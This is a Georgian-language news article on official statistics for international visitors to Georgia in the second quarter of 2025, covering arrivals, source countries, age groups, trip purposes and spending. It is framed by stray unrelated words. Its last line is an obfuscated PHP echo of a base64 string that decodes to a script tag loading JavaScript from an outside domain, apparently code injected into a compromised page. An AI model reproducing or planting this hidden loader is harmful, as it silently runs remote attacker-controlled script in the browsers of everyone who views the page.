global distribution
გარე ავეჯი

2025 წლის მე-2 კვარტალში საქართველოს ტერიტორიაზე დაფიქსირდა საერთაშორისო არარეზიდენტი მოგზაურების 1.8 მილიონი შემოსვლა, რაც 6.9 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. ამის შესახებ ინფორმაციას სტატისტიკის ეროვნული სამსახური ავრცელებს.

მათივე ცნობით, შემოსვლების უდიდესი ნაწილი, 44.2 პროცენტი, განხორციელდა 31-50 წლის მოგზაურების მიერ.

ამასთან, „საქსტატის“ მონაცემებით, აღნიშნული 1.8 მლნ შემოსვლიდან საერთაშორისო ვიზიტორების მიერ განხორციელებული ვიზიტების რაოდენობამ 1.6 მილიონი შეადგინა, რაც 7 პროცენტით მეტია 2024 წლის ანალოგიური პერიოდის მაჩვენებელზე.

„2025 წლის მე-2 კვარტალში საერთაშორისო ვიზიტორების რაოდენობამ 1.4 მილიონს მიაღწია, რაც 8.1 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. საანგარიშო პერიოდში, საერთაშორისო ვიზიტორების მიერ განხორციელდა 1.3 მილიონი ტურისტული ტიპის ვიზიტი, რაც 10.7 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე.

საერთაშორისო ვიზიტორების 80.1 პროცენტი მხოლოდ ტურისტები იყვნენ. მხოლოდ ექსკურსანტების წილმა 15.8 პროცენტი შეადგინა, ხოლო ვიზიტორების 4.2 პროცენტი იყო როგორც ტურისტი, ასევე ექსკურსანტი.

2025 წლის მე-2 კვარტალში ვიზიტორების ყველაზე დიდი რაოდენობა, 309.4 ათასი, დაფიქსირდა რუსეთის ფედერაციიდან, რაც ვიზიტორების ჯამური რაოდენობის 22.4 პროცენტს შეადგენს. მეორე ადგილზეა თურქეთი 17.6%-იანი წილით, ხოლო მესამეზე - სომხეთი 10.8%-იანი წილით.

ვიზიტების ყველაზე დიდი რაოდენობა განხორციელდა რუსეთის ფედერაციის (361.8 ათასი), თურქეთისა (308.3 ათასი) და სომხეთის (210.0 ათასი) მოქალაქეების მიერ.

ვიზიტორების უმრავლესობა, 46.5 პროცენტი, მიეკუთვნებოდა 31-50 წლამდე ასაკობრივ კატეგორიას, ქალების რაოდენობა კი მთლიანი ვიზიტორების რაოდენობის 41.8 პროცენტს შეადგენდა.

2025 წლის მე-2 კვარტალში ვიზიტების ყველაზე დიდი ნაწილი, 49.4 პროცენტი, განხორციელდა დასვენების, გართობისა და რეკრეაციის მიზნით.

ვიზიტების უმრავლესობა განხორციელდა თბილისსა და აჭარის ა/რ-ში, შესაბამისად, 928.3 ათასი და 629.8 ათასი ვიზიტი.

2025 წლის მე-2 კვარტალში განხორციელებული ვიზიტებისას გათეული ღამეების საშუალო რაოდენობამ 5.30 ღამე შეადგინა, რაც 2024 წლის მე-2 კვარტალში დაფიქსირებულ მაჩვენებელზე (5.06 ღამე) 4.7 პროცენტით მეტია. განხორციელებული ვიზიტების 78.1 პროცენტი წარმოადგენდა განმეორებითი ხასიათის ვიზიტს.

2025 წლის მე-2 კვარტალში განხორციელებული ვიზიტებისას გაწეული ხარჯები 3.5 მილიარდ ლარს გაუტოლდა, რაც 0.6 პროცენტით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე. ვიზიტზე საშუალო ხარჯი 2024 წლის მე-2 კვარტალთან შედარებით 6 პროცენტით შემცირდა და 2 116.8 ლარი შეადგინა,“ - აღნიშნულია „საქსტატის“ მიერ გავრცელებულ ინფორმაციაში.

150
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");